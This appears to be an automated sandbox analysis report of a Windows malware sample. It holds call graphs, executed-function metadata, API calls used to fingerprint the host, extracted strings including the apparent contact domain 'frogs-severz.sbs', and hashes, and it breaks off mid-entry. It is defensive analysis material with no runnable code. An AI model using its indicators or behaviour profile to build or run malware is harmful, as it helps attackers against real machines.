6887->6888 6888->6888 6897 3db8e0 6888->6897 6890 3c8d6d 6890->6807 6892 3c8d45 6892->6890 6895 3c8e66 6892->6895 6905 3dbb20 6892->6905 6909 3dc040 6892->6909 6896 3c8ece 6895->6896 6917 3dbfa0 6895->6917 6896->6807 6898 3db900 6897->6898 6899 3db93e 6898->6899 6921 3ddf70 LdrInitializeThunk 6898->6921 6900 3db7e0 RtlAllocateHeap 6899->6900 6904 3dba1f 6899->6904 6902 3db9c5 6900->6902 6902->6904 6922 3ddf70 LdrInitializeThunk 6902->6922 6904->6892 6906 3dbb31 6905->6906 6907 3dbbce 6905->6907 6906->6907 6923 3ddf70 LdrInitializeThunk 6906->6923 6907->6892 6911 3dc090 6909->6911 6910 3dc73e 6910->6892 6913 3dc0d8 6911->6913 6924 3ddf70 LdrInitializeThunk 6911->6924 6913->6910 6914 3dc6cf 6913->6914 6916 3ddf70 LdrInitializeThunk 6913->6916 6914->6910 6925 3ddf70 LdrInitializeThunk 6914->6925 6916->6913 6918 3dbfc0 6917->6918 6919 3dc00e 6918->6919 6926 3ddf70 LdrInitializeThunk 6918->6926 6919->6895 6921->6899 6922->6904 6923->6907 6924->6913 6925->6910 6926->6919 6927 3adc33 6928 3adcd0 6927->6928 6929 3add4e 6928->6929 6931 3ddf70 LdrInitializeThunk 6928->6931 6931->6929 6932 3aceb3 CoInitializeSecurity 7022 3ae970 7023 3ae8b8 7022->7023 7025 3ae948 7023->7025 7026 3ddf70 LdrInitializeThunk 7023->7026 7025->7025 7026->7025 7019 3b9130 7020 3db8e0 2 API calls 7019->7020 7021 3b9158 7020->7021 7050 3bdb30 7051 3bdb70 7050->7051 7051->7051 7054 3ab210 7051->7054 7055 3ab2a0 7054->7055 7055->7055 7056 3ab2d6 7055->7056 7057 3dded0 RtlAllocateHeap RtlReAllocateHeap 7055->7057 7057->7055 7058 3ac32b 7059 3dded0 2 API calls 7058->7059 7060 3ac338 7059->7060 7000 3ae88f 7001 3ae88e 7000->7001 7001->7000 7003 3ae89c 7001->7003 7006 3ddf70 LdrInitializeThunk 7001->7006 7005 3ae948 7003->7005 7007 3ddf70 LdrInitializeThunk 7003->7007 7006->7003 7007->7005 6933 3a89a0 6937 3a89af 6933->6937 6934 3a8cb3 ExitProcess 6935 3a8cae 6942 3ddeb0 6935->6942 6937->6934 6937->6935 6941 3ace80 CoInitializeEx 6937->6941 6945 3df460 6942->6945 6944 3ddeb5 FreeLibrary 6944->6934 6946 3df469 6945->6946 6946->6944 6952 3c1960 6953 3c19d8 6952->6953 6958 3b9530 6953->6958 6955 3c1a84 6956 3b9530 LdrInitializeThunk 6955->6956 6957 3c1b29 6956->6957 6959 3b9560 6958->6959 6959->6959 6960 3e0480 LdrInitializeThunk 6959->6960 6965 3b962e 6960->6965 6961 3b974b 6976 3e07b0 6961->6976 6962 3b9756 6967 3b9783 6962->6967 6969 3b96ca 6962->6969 6970 3e0880 6962->6970 6963 3e0480 LdrInitializeThunk 6963->6965 6965->6961 6965->6962 6965->6963 6965->6967 6965->6969 6967->6969 6980 3ddf70 LdrInitializeThunk 6967->6980 6969->6955 6971 3e08b0 6970->6971 6974 3e08fe 6971->6974 6981 3ddf70 LdrInitializeThunk 6971->6981 6973 3e09ae 6973->6967 6974->6973 6982 3ddf70 LdrInitializeThunk 6974->6982 6977 3e07e0 6976->6977 6978 3e082e 6977->6978 6983 3ddf70 LdrInitializeThunk 6977->6983 6978->6962 6980->6969 6981->6974 6982->6973 6983->6978 7008 3dbce0 7009 3dbd5a 7008->7009 7011 3dbcf2 7008->7011 7010 3dbd52 7013 3dbede 7010->7013 7017 3ddf70 LdrInitializeThunk 7010->7017 7011->7009 7011->7010 7016 3ddf70 LdrInitializeThunk 7011->7016 7013->7009 7018 3ddf70 LdrInitializeThunk 7013->7018 7016->7010 7017->7013 7018->7009 7032 3e0a00 7034 3e0a30 7032->7034 7033 3e0b2e 7036 3e0a7e 7034->7036 7038 3ddf70 LdrInitializeThunk 7034->7038 7036->7033 7039 3ddf70 LdrInitializeThunk 7036->7039 7038->7036 7039->7033 7045 3e02c0 7046 3e02e0 7045->7046 7047 3e041e 7046->7047 7049 3ddf70 LdrInitializeThunk 7046->7049 7049->7047 6984 3acf05 6985 3acf20 6984->6985 6990 3d9030 6985->6990 6987 3acf7a 6988 3d9030 5 API calls 6987->6988 6989 3ad3ca 6988->6989 6991 3d9090 6990->6991 6992 3d91b1 SysAllocString 6991->6992 6996 3d966a 6991->6996 6994 3d91df 6992->6994 6993 3d969c GetVolumeInformationW 6998 3d96ba 6993->6998 6995 3d91ea CoSetProxyBlanket 6994->6995 6994->6996 6995->6996 6999 3d920a 6995->6999 6996->6993 6997 3d9658 SysFreeString SysFreeString 6997->6996 6998->6987 6999->6997

                                                                        Executed Functions

                                                                        Function 003C3D70 Relevance: 24.3, Strings: 19, Instructions: 515COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 3c3d70-3c3db5 call 3e0480 3 3c451a-3c452a 0->3 4 3c3dbb-3c3e24 call 3b9500 call 3db7e0 0->4 9 3c3e29-3c3e37 4->9 9->9 10 3c3e39 9->10 11 3c3e3b-3c3e3e 10->11 12 3c3e66-3c3e6d 11->12 13 3c3e40-3c3e64 11->13 14 3c3e6f-3c3e7a 12->14 13->11 15 3c3e7c 14->15 16 3c3e81-3c3e98 14->16 17 3c3f3b-3c3f3e 15->17 18 3c3e9f-3c3eaa 16->18 19 3c3e9a-3c3f28 16->19 20 3c3f40 17->20 21 3c3f42-3c3f47 17->21 23 3c3eac-3c3f1c call 3ddf70 18->23 24 3c3f2a-3c3f2f 18->24 19->24 20->21 25 3c3f4d-3c3f5d 21->25 26 3c442b-3c4470 call 3db860 21->26 31 3c3f21-3c3f26 23->31 28 3c3f31 24->28 29 3c3f33-3c3f36 24->29 30 3c3f5f-3c3f7c 25->30 36 3c4475-3c4483 26->36 28->17 29->14 34 3c4134 30->34 35 3c3f82-3c3fa1 30->35 31->24 37 3c4138-3c413b 34->37 38 3c3fa3-3c3fa6 35->38 36->36 39 3c4485 36->39 40 3c413d-3c4141 37->40 41 3c4143-3c4154 call 3db7e0 37->41 42 3c3fbf-3c3fdd call 3c4530 38->42 43 3c3fa8-3c3fbd 38->43 44 3c4487-3c448a 39->44 45 3c416a-3c416c 40->45 55 3c4166-3c4168 41->55 56 3c4156-3c4161 41->56 42->34 60 3c3fe3-3c401e 42->60 43->38 48 3c448c-3c44b0 44->48 49 3c44b2-3c44b9 44->49 51 3c4404-3c4409 45->51 52 3c4172-3c4191 45->52 48->44 54 3c44bb-3c44c1 49->54 57 3c440b-3c4413 51->57 58 3c4415-3c4419 51->58 59 3c4196-3c41a1 52->59 61 3c44c5-3c44d9 54->61 62 3c44c3 54->62 55->45 63 3c441d-3c4421 56->63 64 3c441b 57->64 58->64 59->59 65 3c41a3-3c41ab 59->65 66 3c4023-3c4031 60->66 67 3c44dd-3c44e3 61->67 68 3c44db 61->68 62->3 63->30 69 3c4427-3c4429 63->69 64->63 70 3c41ad-3c41b0 65->70 66->66 71 3c4033-3c4037 66->71 72 3c450a-3c450d 67->72 73 3c44e5-3c4505 call 3ddf70 67->73 68->72 69->26 75 3c41e2-3c4217 70->75 76 3c41b2-3c41e0 70->76 77 3c4039-3c403c 71->77 81 3c450f-3c4511 72->81 82 3c4513-3c4518 72->82 73->72 83 3c421c-3c4227 75->83 76->70 78 3c403e-3c4062 77->78 79 3c4064-3c4082 call 3c4530 77->79 78->77 90 3c408d-3c40ad 79->90 91 3c4084-3c4088 79->91 81->3 82->54 83->83 84 3c4229-3c422b 83->84 86 3c422f-3c4232 84->86 88 3c4254-3c4258 86->88 89 3c4234-3c4252 86->89 92 3c425a-3c4265 88->92 89->86 93 3c40af 90->93 94 3c40b1-3c4132 call 3a82b0 call 3b9160 call 3a82c0 90->94 91->37 95 3c426c-3c4283 92->95 96 3c4267 92->96 93->94 94->37 99 3c428a-3c4295 95->99 100 3c4285-3c4321 95->100 98 3c4334-3c4337 96->98 102 3c4339 98->102 103 3c433b-3c435c 98->103 105 3c429b-3c4315 call 3ddf70 99->105 106 3c4323-3c4328 99->106 100->106 102->103 113 3c4361-3c436c 103->113 114 3c431a-3c431f 105->114 111 3c432c-3c432f 106->111 112 3c432a 106->112 111->92 112->98 113->113 115 3c436e 113->115 114->106 117 3c4370-3c4373 115->117 119 3c4399-3c439f 117->119 120 3c4375-3c4397 117->120 122 3c43d5-3c43d8 119->122 123 3c43a1-3c43a5 119->123 120->117 124 3c43ed-3c43f3 122->124 125 3c43da-3c43e1 call 3db860 122->125 126 3c43a7-3c43ae 123->126 128 3c43f5-3c43f8 124->128 131 3c43e6-3c43eb 125->131 129 3c43be-3c43c7 126->129 130 3c43b0-3c43bc 126->130 128->51 132 3c43fa-3c4402 128->132 133 3c43c9 129->133 134 3c43cb 129->134 130->126 131->128 132->63 135 3c43d1-3c43d3 133->135 134->135 135->122
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID: $!@$,$9$:$;$`$`$`$e$e$e$f$f$f$g$g$g$n
                                                                        • API String ID: 1279760036-1524723224
                                                                        • Opcode ID: 50db994c031c359ed39863e1208a4b2270142f2bda9caaefda92f57c440adac0
                                                                        • Instruction ID: be7d25dd2040c3e420fffc12ad8d395eeaa14eb16364642b063388910fcf257e
                                                                        • Opcode Fuzzy Hash: 50db994c031c359ed39863e1208a4b2270142f2bda9caaefda92f57c440adac0
                                                                        • Instruction Fuzzy Hash: F822AE7550C3808FD3268F28C4A4BAEBBE1AB95314F19892DE5D5CB392D3768C45CB53
                                                                        Function 003D9030 Relevance: 21.6, APIs: 5, Strings: 7, Instructions: 629memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 136 3d9030-3d9089 137 3d9090-3d90c6 136->137 137->137 138 3d90c8-3d90e4 137->138 140 3d90e6 138->140 141 3d90f1-3d913f 138->141 140->141 143 3d968c-3d96b8 call 3df9a0 GetVolumeInformationW 141->143 144 3d9145-3d9177 141->144 149 3d96bc-3d96df call 3c0650 143->149 150 3d96ba 143->150 145 3d9180-3d91af 144->145 145->145 147 3d91b1-3d91e4 SysAllocString 145->147 153 3d91ea-3d9204 CoSetProxyBlanket 147->153 154 3d9674-3d9688 147->154 158 3d96e0-3d96e8 149->158 150->149 156 3d966a-3d9670 153->156 157 3d920a-3d9225 153->157 154->143 156->154 160 3d9230-3d9262 157->160 158->158 161 3d96ea-3d96ec 158->161 160->160 162 3d9264-3d92df 160->162 163 3d96fe-3d972d call 3c0650 161->163 164 3d96ee-3d96fb call 3a8330 161->164 172 3d92e0-3d930b 162->172 171 3d9730-3d9738 163->171 164->163 171->171 173 3d973a-3d973c 171->173 172->172 174 3d930d-3d933d 172->174 175 3d974e-3d977d call 3c0650 173->175 176 3d973e-3d974b call 3a8330 173->176 184 3d9658-3d9668 SysFreeString * 2 174->184 185 3d9343-3d9365 174->185 182 3d9780-3d9788 175->182 176->175 182->182 186 3d978a-3d978c 182->186 184->156 193 3d964b-3d9655 185->193 194 3d936b-3d936e 185->194 187 3d979e-3d97cb call 3c0650 186->187 188 3d978e-3d979b call 3a8330 186->188 197 3d97d0-3d97d8 187->197 188->187 193->184 194->193 196 3d9374-3d9379 194->196 196->193 198 3d937f-3d93cf 196->198 197->197 199 3d97da-3d97dc 197->199 205 3d93d0-3d9416 198->205 201 3d97ee-3d97f5 199->201 202 3d97de-3d97eb call 3a8330 199->202 202->201 205->205 207 3d9418-3d942d 205->207 208 3d9431-3d9433 207->208 209 3d9439-3d943f 208->209 210 3d9636-3d9647 208->210 209->210 211 3d9445-3d9452 209->211 210->193 213 3d948d 211->213 214 3d9454-3d9459 211->214 215 3d948f-3d94b7 call 3a82b0 213->215 216 3d946c-3d9470 214->216 226 3d94bd-3d94cb 215->226 227 3d95e8-3d95f9 215->227 217 3d9460 216->217 218 3d9472-3d947b 216->218 221 3d9461-3d946a 217->221 222 3d947d-3d9480 218->222 223 3d9482-3d9486 218->223 221->215 221->216 222->221 223->221 225 3d9488-3d948b 223->225 225->221 226->227 228 3d94d1-3d94d5 226->228 229 3d95fb 227->229 230 3d9600-3d960c 227->230 233 3d94e0-3d94ea 228->233 229->230 231 3d960e 230->231 232 3d9613-3d9633 call 3a82e0 call 3a82c0 230->232 231->232 232->210 235 3d94ec-3d94f1 233->235 236 3d9500-3d9506 233->236 238 3d9590-3d9596 235->238 239 3d9508-3d950b 236->239 240 3d9525-3d9533 236->240 245 3d9598-3d959e 238->245 239->240 241 3d950d-3d9523 239->241 242 3d95aa-3d95b3 240->242 243 3d9535-3d9538 240->243 241->238 249 3d95b9-3d95bc 242->249 250 3d95b5-3d95b7 242->250 243->242 246 3d953a-3d9581 243->246 245->227 248 3d95a0-3d95a2 245->248 246->238 248->233 251 3d95a8 248->251 252 3d95be-3d95e2 249->252 253 3d95e4-3d95e6 249->253 250->245 251->227 252->238 253->238
                                                                        APIs
                                                                        • SysAllocString.OLEAUT32(13C511C2), ref: 003D91B7
                                                                        • CoSetProxyBlanket.COMBASE(0000FDFC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 003D91FD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AllocBlanketProxyString
                                                                        • String ID: =3$C$E!q#$E!q#$Lgfe$\$IK
                                                                        • API String ID: 900851650-4011188741
                                                                        • Opcode ID: 06b1b71e5c359e97021c93a7076041fb7de408fe8c6d17bc9114fed43966cce8
                                                                        • Instruction ID: 8f85be92660121904cba609153c47764eeba3c31dda490a77d6a9fc20feae01c
                                                                        • Opcode Fuzzy Hash: 06b1b71e5c359e97021c93a7076041fb7de408fe8c6d17bc9114fed43966cce8
                                                                        • Instruction Fuzzy Hash: FA2254B29083009FD725CF20D881B6BBBAAEF95314F158A1EF4959B3C1D774E905CB92
                                                                        Function 003ACF05 Relevance: 18.1, Strings: 14, Instructions: 574COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 254 3acf05-3acf12 255 3acf20-3acf5c 254->255 255->255 256 3acf5e-3acfa5 call 3a8930 call 3d9030 255->256 261 3acfb0-3acffc 256->261 261->261 262 3acffe-3ad06b 261->262 263 3ad070-3ad097 262->263 263->263 264 3ad099-3ad0aa 263->264 265 3ad0cb-3ad0d3 264->265 266 3ad0ac-3ad0b3 264->266 268 3ad0eb-3ad0f8 265->268 269 3ad0d5-3ad0d6 265->269 267 3ad0c0-3ad0c9 266->267 267->265 267->267 271 3ad0fa-3ad101 268->271 272 3ad11b-3ad123 268->272 270 3ad0e0-3ad0e9 269->270 270->268 270->270 273 3ad110-3ad119 271->273 274 3ad13b-3ad266 272->274 275 3ad125-3ad126 272->275 273->272 273->273 276 3ad270-3ad2ce 274->276 277 3ad130-3ad139 275->277 276->276 278 3ad2d0-3ad2ff 276->278 277->274 277->277 279 3ad300-3ad31a 278->279 279->279 280 3ad31c-3ad36b call 3ab960 279->280 283 3ad370-3ad3ac 280->283 283->283 284 3ad3ae-3ad3c5 call 3a8930 call 3d9030 283->284 288 3ad3ca-3ad3eb 284->288 289 3ad3f0-3ad43c 288->289 289->289 290 3ad43e-3ad4ab 289->290 291 3ad4b0-3ad4d7 290->291 291->291 292 3ad4d9-3ad4ea 291->292 293 3ad4fb-3ad503 292->293 294 3ad4ec-3ad4ef 292->294 296 3ad51b-3ad528 293->296 297 3ad505-3ad506 293->297 295 3ad4f0-3ad4f9 294->295 295->293 295->295 299 3ad52a-3ad531 296->299 300 3ad54b-3ad557 296->300 298 3ad510-3ad519 297->298 298->296 298->298 301 3ad540-3ad549 299->301 302 3ad56b-3ad696 300->302 303 3ad559-3ad55a 300->303 301->300 301->301 305 3ad6a0-3ad6fe 302->305 304 3ad560-3ad569 303->304 304->302 304->304 305->305 306 3ad700-3ad72f 305->306 307 3ad730-3ad74a 306->307 307->307 308 3ad74c-3ad791 call 3ab960 307->308
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ()$+S7U$,_"Q$0C%E$7W"i$;[*]$<KuM$E0081D6A60C8C436D7CBBD6DF28D3732$N3F5$S7HI$frogs-severz.sbs$y?O1$c]e$gy
                                                                        • API String ID: 0-4089135330
                                                                        • Opcode ID: d71b09f4518dc16af3e877ec97564f2a4054b59143cd864e0bc77046e0abc95d
                                                                        • Instruction ID: e636b20c3bed400b1ebcb3f03910b1a650776c9458d0ed413cb64153fa224433
                                                                        • Opcode Fuzzy Hash: d71b09f4518dc16af3e877ec97564f2a4054b59143cd864e0bc77046e0abc95d
                                                                        • Instruction Fuzzy Hash: FE12FBB15883D18ED3368F25C495BEFBBE1EBD2304F19896CC4DA5B252C775090ACB92
                                                                        Function 003A98F0 Relevance: 11.7, Strings: 9, Instructions: 428COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 311 3a98f0-3a98fe 312 3a9904-3a997f call 3a61a0 call 3a82b0 311->312 313 3a9e75 311->313 319 3a9980-3a99b5 312->319 314 3a9e77-3a9e83 313->314 319->319 320 3a99b7-3a99df call 3a9210 319->320 323 3a99e0-3a9a5b 320->323 323->323 324 3a9a5d-3a9a99 call 3a9210 323->324 327 3a9aa0-3a9ae1 324->327 327->327 328 3a9ae3-3a9b2f call 3a9210 327->328 331 3a9b30-3a9b56 328->331 331->331 332 3a9b58-3a9b6f 331->332 333 3a9b70-3a9bdc 332->333 333->333 334 3a9bde-3a9c0e call 3a9210 333->334 337 3a9c10-3a9c6e 334->337 337->337 338 3a9c70-3a9d4b call 3a94d0 337->338 341 3a9d50-3a9d7e 338->341 341->341 342 3a9d80-3a9d88 341->342 343 3a9d8a-3a9d92 342->343 344 3a9db1-3a9dbc 342->344 345 3a9da0-3a9daf 343->345 346 3a9dbe-3a9dc1 344->346 347 3a9de1-3a9e0b 344->347 345->344 345->345 348 3a9dd0-3a9ddf 346->348 349 3a9e10-3a9e36 347->349 348->347 348->348 349->349 350 3a9e38-3a9e58 call 3ac570 call 3a82c0 349->350 354 3a9e5d-3a9e73 350->354 354->314
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: DG$E0081D6A60C8C436D7CBBD6DF28D3732$Ohs,$chs,$fhnf$fhnf$xy$su${}
                                                                        • API String ID: 0-2816888744
                                                                        • Opcode ID: 4bcc5d6164e05956d15447e1a4f180f354fe2a09878f954d04205d2edf7a1ef5
                                                                        • Instruction ID: 2468a6fff21c61abad93bc764b2fbd6c22efa28850c3b1bf1248acb43b5b401f
                                                                        • Opcode Fuzzy Hash: 4bcc5d6164e05956d15447e1a4f180f354fe2a09878f954d04205d2edf7a1ef5
                                                                        • Instruction Fuzzy Hash: FCE15B72A483504BD329CF35C8517ABBBE6EBD2314F198A2DE5E59B391D734C805CB42
                                                                        Function 003AE35B Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 295COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 355 3ae35b-3ae393 call 3d4600 call 3a98f0 CoUninitialize 360 3ae3a0-3ae3d2 355->360 360->360 361 3ae3d4-3ae3ef 360->361 362 3ae3f0-3ae428 361->362 362->362 363 3ae42a-3ae499 362->363 364 3ae4a0-3ae4ba 363->364 364->364 365 3ae4bc-3ae4cd 364->365 366 3ae4eb-3ae4f3 365->366 367 3ae4cf-3ae4df 365->367 369 3ae50b-3ae515 366->369 370 3ae4f5-3ae4f6 366->370 368 3ae4e0-3ae4e9 367->368 368->366 368->368 372 3ae52b-3ae533 369->372 373 3ae517-3ae51b 369->373 371 3ae500-3ae509 370->371 371->369 371->371 374 3ae54b-3ae555 372->374 375 3ae535-3ae536 372->375 376 3ae520-3ae529 373->376 378 3ae56b-3ae577 374->378 379 3ae557-3ae55b 374->379 377 3ae540-3ae549 375->377 376->372 376->376 377->374 377->377 381 3ae579-3ae57b 378->381 382 3ae591-3ae6b3 378->382 380 3ae560-3ae569 379->380 380->378 380->380 383 3ae580-3ae58d 381->383 384 3ae6c0-3ae6da 382->384 383->383 385 3ae58f 383->385 384->384 386 3ae6dc-3ae70f 384->386 385->382 387 3ae710-3ae72b 386->387 387->387 388 3ae72d-3ae77d call 3ab960 387->388
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Uninitialize
                                                                        • String ID: Lk$U\$Zb$frogs-severz.sbs$r
                                                                        • API String ID: 3861434553-2060998389
                                                                        • Opcode ID: 79dd65b385700aefae72e21a07e59c64979ccd5d6c2e3a4b11c1e9f11d2dd524
                                                                        • Instruction ID: b7d0370918cbaa310166a3a6d4792d68d05654a1b59b1dd66e7c6eac2c3d05fd
                                                                        • Opcode Fuzzy Hash: 79dd65b385700aefae72e21a07e59c64979ccd5d6c2e3a4b11c1e9f11d2dd524
                                                                        • Instruction Fuzzy Hash: 12A1AE7050C3D18AD7768F25D4A47EFBBE1EB93308F188A5CD0E94B292DB3985058B57
                                                                        Function 003A89A0 Relevance: 1.8, APIs: 1, Instructions: 252COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
